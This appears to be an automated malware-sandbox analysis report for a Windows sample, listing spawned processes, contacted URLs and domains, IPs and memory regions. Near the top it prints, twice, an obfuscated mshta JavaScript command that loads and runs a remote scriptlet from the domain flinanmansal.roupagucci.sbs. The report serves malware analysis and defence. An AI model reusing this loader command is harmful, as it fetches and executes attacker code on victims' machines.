Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
|
||
C:\Windows\System32\mshta.exe
|
MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://mmdhdsnappytv-vh.akamaihd.net
|
unknown
|
||
https://iframe.arkos
|
unknown
|
||
https://www.twitter.com/8
|
unknown
|
||
https://cm.g.double
|
unknown
|
||
https://iframe.arkoselabs.com/
|
unknown
|
||
https://twitter.com/$
|
unknown
|
||
https://media.riffsy.com
|
unknown
|
||
https://twitter.com/privacy
|
unknown
|
||
https://cm.g.doubleclick.net
|
unknown
|
||
https://ton-staging.pdxa.twitter.com
|
unknown
|
||
https://www.twitter.com/0
|
unknown
|
||
https://analytics.twitter.com
|
unknown
|
||
https://www.periscope.tv
|
unknown
|
||
https://dhdsnappytv-vh.akamaihd.net
|
unknown
|
||
https://localhost.twitter.com:3443
|
unknown
|
||
https://c.tenor.com
|
unknown
|
||
http://micrt.co
|
unknown
|
||
https://support.twitter.com/articles/20170514
|
unknown
|
||
https://vmap.snappytv.com
|
unknown
|
||
https://www.twitter.com/H
|
unknown
|
||
https://ads-twitter.com
|
unknown
|
||
https://www.pscp.tv
|
unknown
|
||
https://upload.x.com
|
unknown
|
||
https://vmap.grabyo.com
|
unknown
|
||
https://checkoutshopper-live.adyen.com
|
unknown
|
||
https://twitter.com/(
|
unknown
|
||
https://ton.twitter.com
|
unknown
|
||
https://recaptcha.net/recaptcha/
|
unknown
|
||
https://static.ads-twitter.com
|
unknown
|
||
https://vmapstage.snappytv.com
|
unknown
|
||
https://pay.twitter.com
|
unknown
|
||
https://api.x.ai
|
unknown
|
||
https://ton.x.com
|
unknown
|
||
https://api.twitter.com
|
unknown
|
||
https://twitter.com
|
unknown
|
||
https://upload.twitter.com
|
unknown
|
||
https://api-stream.twitter.com
|
unknown
|
||
https://vaultjs.apideck.com/
|
unknown
|
||
https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
|
unknown
|
||
https://cards-frame.twitter.com
|
unknown
|
||
https://pay.x.com
|
unknown
|
||
https://sentry.io
|
unknown
|
||
https://mobile.twitter.com
|
unknown
|
||
https://ton-staging.pdxa.x.com
|
unknown
|
||
https://vmaprel.snappytv.com
|
unknown
|
||
https://www.twitter.com
|
unknown
|
||
https://flinanmansal.roupagucci.sbs/
|
unknown
|
||
https://dwo3ckksxlb0v.cloudfront.net;
|
unknown
|
||
https://ton-staging.atla.twitter.com
|
unknown
|
||
https://www.twitter.com/x
|
unknown
|
||
https://t.co/1/i/adsct;
|
unknown
|
||
https://business.twitter.com/en/help/troubleshooting/how-twitter-ads-work.html?ref=web-twc-ao-gbl-ad
|
unknown
|
||
https://pdhdsnappytv-vh.akamaihd.net
|
unknown
|
||
https://www.twitter.com(
|
unknown
|
||
HTtps://flinanmansal.roupagucci.sbs/?1/
|
unknown
|
||
https://www.twitter.com/
|
104.244.42.65
|
||
https://dwo3ckksxlb0v.cloudfront.net
|
unknown
|
||
https://flinanmansal.roupagucci.sbs/?1/9?s
|
unknown
|
||
https://scontent.xx.fbcdn.net
|
unknown
|
||
https://localhost.x.com:3443;
|
unknown
|
||
https://media.tenor.com
|
unknown
|
||
https://prod-periscope-profile.s3-us-west-2.amazonaws.com
|
unknown
|
||
https://legal.twitter.com/imprint.html
|
unknown
|
||
https://prod-periscope-profile.s1
|
unknown
|
||
https://twitter.com/
|
104.244.42.65
|
||
https://flinanmansal.roupagucci.sbs/?1/??u
|
unknown
|
||
https://flinanmansal.roupagucci.sbs/?1/
|
104.21.29.223
|
||
https://aa.twitter.com
|
unknown
|
||
https://platform-lookaside.fbsbx.com
|
unknown
|
||
https://analytics.x.com
|
unknown
|
||
https://caps.twitter.com
|
unknown
|
||
https://twitter.com/tos
|
unknown
|
||
https://abs.twimg.com/errors/logo46x38
|
unknown
|
||
https://aa.x.com
|
unknown
|
||
https://flinanmansal.roupagucci.sbs/?1/Ztu
|
unknown
|
||
https://mpdhdsnappytv-vh.akamaihd.net
|
unknown
|
||
https://api-stream.x.com
|
unknown
|
||
https://mobile.x.com
|
unknown
|
||
https://ton-staging.atla.x.com
|
unknown
|
||
https://www.google.com/recaptcha/
|
unknown
|
||
https://ads-api.x.com
|
unknown
|
||
https://ads-api.twitter.com
|
unknown
|
||
https://help.twitter.com/using-twitter/twitter-supported-browsers
|
unknown
|
||
https://abs.twimg.com/errors/logo46x38.png
|
unknown
|
||
https://scontent-sea1-1.xx.fbcdn.net
|
unknown
|
||
https://x.com
|
unknown
|
||
https://mdhdsnappytv-vh.akamaihd.net
|
unknown
|
||
https://caps.x.com
|
unknown
|
||
https://api.x.com
|
unknown
|
||
https://client-api.arkoselabs.com/
|
unknown
|
There are 80 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
twitter.com
|
104.244.42.65
|
||
flinanmansal.roupagucci.sbs
|
104.21.29.223
|
||
www.twitter.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.244.42.65
|
twitter.com
|
United States
|
||
104.21.29.223
|
flinanmansal.roupagucci.sbs
|
United States
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2A68F3B7000
|
heap
|
page read and write
|
||
29E8CE67000
|
heap
|
page read and write
|
||
2A68F164000
|
heap
|
page read and write
|
||
29E8CE9D000
|
heap
|
page read and write
|
||
A98324C000
|
stack
|
page read and write
|
||
2A68F158000
|
heap
|
page read and write
|
||
2A68F313000
|
heap
|
page read and write
|
||
29E8CE66000
|
heap
|
page read and write
|
||
2A68F16C000
|
heap
|
page read and write
|
||
2A68F153000
|
heap
|
page read and write
|
||
2A68F0D5000
|
trusted library allocation
|
page read and write
|
||
2A68F16C000
|
heap
|
page read and write
|
||
2A68F36A000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
2A68F3B5000
|
heap
|
page read and write
|
||
A98379E000
|
stack
|
page read and write
|
||
29E8D176000
|
heap
|
page read and write
|
||
2A68F170000
|
heap
|
page read and write
|
||
2A68F15B000
|
heap
|
page read and write
|
||
2A68F37B000
|
heap
|
page read and write
|
||
2A68F343000
|
heap
|
page read and write
|
||
2A68F3B5000
|
heap
|
page read and write
|
||
29E8CE9A000
|
heap
|
page read and write
|
||
2A68F343000
|
heap
|
page read and write
|
||
29E8CEC7000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
2A68F175000
|
heap
|
page read and write
|
||
2A68F3B7000
|
heap
|
page read and write
|
||
29E8D02E000
|
heap
|
page read and write
|
||
2A68F318000
|
heap
|
page read and write
|
||
2A68F0F1000
|
heap
|
page read and write
|
||
2A68F16C000
|
heap
|
page read and write
|
||
2A68EED0000
|
heap
|
page read and write
|
||
2A68F15D000
|
heap
|
page read and write
|
||
29E8CE63000
|
heap
|
page read and write
|
||
2A68F311000
|
heap
|
page read and write
|
||
29E8CE6C000
|
heap
|
page read and write
|
||
2A68F310000
|
heap
|
page read and write
|
||
2A68F108000
|
heap
|
page read and write
|
||
29E8D014000
|
heap
|
page read and write
|
||
29E8CDD0000
|
heap
|
page read and write
|
||
29E8CE72000
|
heap
|
page read and write
|
||
29E8CE09000
|
heap
|
page read and write
|
||
2A68F38E000
|
heap
|
page read and write
|
||
29E8D130000
|
trusted library allocation
|
page read and write
|
||
2A68F371000
|
heap
|
page read and write
|
||
2A68F10A000
|
heap
|
page read and write
|
||
2A68F153000
|
heap
|
page read and write
|
||
2A68F3AD000
|
heap
|
page read and write
|
||
29E8CDE0000
|
heap
|
page read and write
|
||
29E8D029000
|
heap
|
page read and write
|
||
2A68F1F5000
|
trusted library allocation
|
page read and write
|
||
29E8CEC7000
|
heap
|
page read and write
|
||
29E8D150000
|
heap
|
page read and write
|
||
2A68F20F000
|
trusted library allocation
|
page read and write
|
||
2A68F3B6000
|
heap
|
page read and write
|
||
2A68F0F0000
|
heap
|
page read and write
|
||
A98314B000
|
stack
|
page read and write
|
||
2A68F170000
|
heap
|
page read and write
|
||
2A68F38E000
|
heap
|
page read and write
|
||
29E8CE0F000
|
heap
|
page read and write
|
||
2A68F3A8000
|
heap
|
page read and write
|
||
2A68F314000
|
heap
|
page read and write
|
||
2A68F15B000
|
heap
|
page read and write
|
||
29E8CE7E000
|
heap
|
page read and write
|
||
2A68F3A9000
|
heap
|
page read and write
|
||
2A68F318000
|
heap
|
page read and write
|
||
29E8CE7E000
|
heap
|
page read and write
|
||
29E8CE9B000
|
heap
|
page read and write
|
||
2A68F39C000
|
heap
|
page read and write
|
||
29E8CE25000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
2A68F3B1000
|
heap
|
page read and write
|
||
2A68F371000
|
heap
|
page read and write
|
||
2A68F108000
|
heap
|
page read and write
|
||
29E8CE7B000
|
heap
|
page read and write
|
||
29E8CEC7000
|
heap
|
page read and write
|
||
29E8CE92000
|
heap
|
page read and write
|
||
2A68F1F8000
|
trusted library allocation
|
page read and write
|
||
2A68F3B7000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
2A68EED4000
|
heap
|
page read and write
|
||
2A68F140000
|
heap
|
page read and write
|
||
2A6933D0000
|
heap
|
page read and write
|
||
2A68EC70000
|
heap
|
page read and write
|
||
2A68F108000
|
heap
|
page read and write
|
||
29E8CED2000
|
heap
|
page read and write
|
||
29E8CE63000
|
heap
|
page read and write
|
||
29E8CE72000
|
heap
|
page read and write
|
||
2A68F16C000
|
heap
|
page read and write
|
||
2A68F410000
|
remote allocation
|
page read and write
|
||
2A68ECA0000
|
heap
|
page read and write
|
||
2A68F15B000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
2A68F3B5000
|
heap
|
page read and write
|
||
29E8D140000
|
trusted library allocation
|
page read and write
|
||
29E8CE4B000
|
heap
|
page read and write
|
||
2A68F140000
|
heap
|
page read and write
|
||
2A68F205000
|
trusted library allocation
|
page read and write
|
||
2A68F3A3000
|
heap
|
page read and write
|
||
2A68F395000
|
heap
|
page read and write
|
||
2A68F0DD000
|
trusted library allocation
|
page read and write
|
||
2A68F3B5000
|
heap
|
page read and write
|
||
2A68F371000
|
heap
|
page read and write
|
||
29E8CEF0000
|
heap
|
page read and write
|
||
2A68F0DB000
|
trusted library allocation
|
page read and write
|
||
2A68F318000
|
heap
|
page read and write
|
||
29E8CED9000
|
heap
|
page read and write
|
||
29E8CE00000
|
heap
|
page read and write
|
||
29E8CE7E000
|
heap
|
page read and write
|
||
2A68F393000
|
heap
|
page read and write
|
||
2A68F343000
|
heap
|
page read and write
|
||
2A68F140000
|
heap
|
page read and write
|
||
2A68F343000
|
heap
|
page read and write
|
||
2A68F3AD000
|
heap
|
page read and write
|
||
29E8D010000
|
heap
|
page read and write
|
||
2A68F170000
|
heap
|
page read and write
|
||
2A68F15B000
|
heap
|
page read and write
|
||
2A68F250000
|
trusted library allocation
|
page execute
|
||
2A68F39C000
|
heap
|
page read and write
|
||
29E8CE6C000
|
heap
|
page read and write
|
||
2A68F3A8000
|
heap
|
page read and write
|
||
29E8CFD0000
|
heap
|
page read and write
|
||
2A68F108000
|
heap
|
page read and write
|
||
29E8CE6C000
|
heap
|
page read and write
|
||
29E8D17E000
|
heap
|
page read and write
|
||
2A68F391000
|
heap
|
page read and write
|
||
2A68F153000
|
heap
|
page read and write
|
||
2A68F109000
|
heap
|
page read and write
|
||
29E8CE92000
|
heap
|
page read and write
|
||
A98369E000
|
stack
|
page read and write
|
||
2A68F371000
|
heap
|
page read and write
|
||
2A68F3A3000
|
heap
|
page read and write
|
||
2A68F164000
|
heap
|
page read and write
|
||
2A68F389000
|
heap
|
page read and write
|
||
2A68F0FA000
|
heap
|
page read and write
|
||
2A68F37D000
|
heap
|
page read and write
|
||
A98334E000
|
stack
|
page read and write
|
||
2A68F103000
|
heap
|
page read and write
|
||
2A68F3AD000
|
heap
|
page read and write
|
||
29E8CE55000
|
heap
|
page read and write
|
||
2A68F386000
|
heap
|
page read and write
|
||
A98359F000
|
stack
|
page read and write
|
||
29E8D154000
|
heap
|
page read and write
|
||
2A68F316000
|
heap
|
page read and write
|
||
2A68F372000
|
heap
|
page read and write
|
||
2A68F120000
|
heap
|
page read and write
|
||
29E8CE72000
|
heap
|
page read and write
|
||
29E8CE4F000
|
heap
|
page read and write
|
||
2A68F164000
|
heap
|
page read and write
|
||
29E8CE72000
|
heap
|
page read and write
|
||
29E8D027000
|
heap
|
page read and write
|
||
2A68F39C000
|
heap
|
page read and write
|
||
2A68F343000
|
heap
|
page read and write
|
||
2A68F164000
|
heap
|
page read and write
|
||
2A68F384000
|
heap
|
page read and write
|
||
29E8CED4000
|
heap
|
page read and write
|
||
29E8CED9000
|
heap
|
page read and write
|
||
2A68F3B7000
|
heap
|
page read and write
|
||
29E8CE7E000
|
heap
|
page read and write
|
||
2A68F410000
|
remote allocation
|
page read and write
|
||
29E8CEF0000
|
heap
|
page read and write
|
||
29E8CE92000
|
heap
|
page read and write
|
||
2A68F175000
|
heap
|
page read and write
|
||
2A68F1F0000
|
trusted library allocation
|
page read and write
|
||
29E8D031000
|
heap
|
page read and write
|
||
2A68F175000
|
heap
|
page read and write
|
||
29E8D15D000
|
heap
|
page read and write
|
||
2A68F318000
|
heap
|
page read and write
|
||
2A68F3A3000
|
heap
|
page read and write
|
||
2A68F161000
|
heap
|
page read and write
|
||
2A68F163000
|
heap
|
page read and write
|
||
2A68F379000
|
heap
|
page read and write
|
||
29E8CED2000
|
heap
|
page read and write
|
||
2A68F158000
|
heap
|
page read and write
|
||
2A68F393000
|
heap
|
page read and write
|
||
2A68F158000
|
heap
|
page read and write
|
||
29E8D17B000
|
heap
|
page read and write
|
||
2A68F3B5000
|
heap
|
page read and write
|
||
2A68F39C000
|
heap
|
page read and write
|
||
29E8CEF0000
|
heap
|
page read and write
|
||
2A68F0D3000
|
trusted library allocation
|
page read and write
|
||
2A692E62000
|
trusted library allocation
|
page read and write
|
||
2A68F395000
|
heap
|
page read and write
|
||
A982CFE000
|
stack
|
page read and write
|
||
2A68F153000
|
heap
|
page read and write
|
||
29E8CE63000
|
heap
|
page read and write
|
||
2A68F140000
|
heap
|
page read and write
|
||
2A68F15E000
|
heap
|
page read and write
|
||
29E8CE92000
|
heap
|
page read and write
|
||
2A68F3A3000
|
heap
|
page read and write
|
||
2A68F10A000
|
heap
|
page read and write
|
||
2A68F3A4000
|
heap
|
page read and write
|
||
29E8CE25000
|
heap
|
page read and write
|
||
29E8CEC7000
|
heap
|
page read and write
|
||
2A68F15B000
|
heap
|
page read and write
|
||
A9829D5000
|
stack
|
page read and write
|
||
2A68F270000
|
heap
|
page readonly
|
||
2A68F3B5000
|
heap
|
page read and write
|
||
2A68F318000
|
heap
|
page read and write
|
||
29E8D170000
|
heap
|
page read and write
|
||
2A68F0D1000
|
trusted library allocation
|
page read and write
|
||
2A68F104000
|
heap
|
page read and write
|
||
29E8CED9000
|
heap
|
page read and write
|
||
2A68F108000
|
heap
|
page read and write
|
||
2A68F410000
|
remote allocation
|
page read and write
|
||
2A68F103000
|
heap
|
page read and write
|
||
A982DFE000
|
stack
|
page read and write
|
||
2A68F3B0000
|
heap
|
page read and write
|
||
2A68F158000
|
heap
|
page read and write
|
||
2A68F0FA000
|
heap
|
page read and write
|
||
2A68F0D9000
|
trusted library allocation
|
page read and write
|
There are 203 hidden memdumps, click here to show them.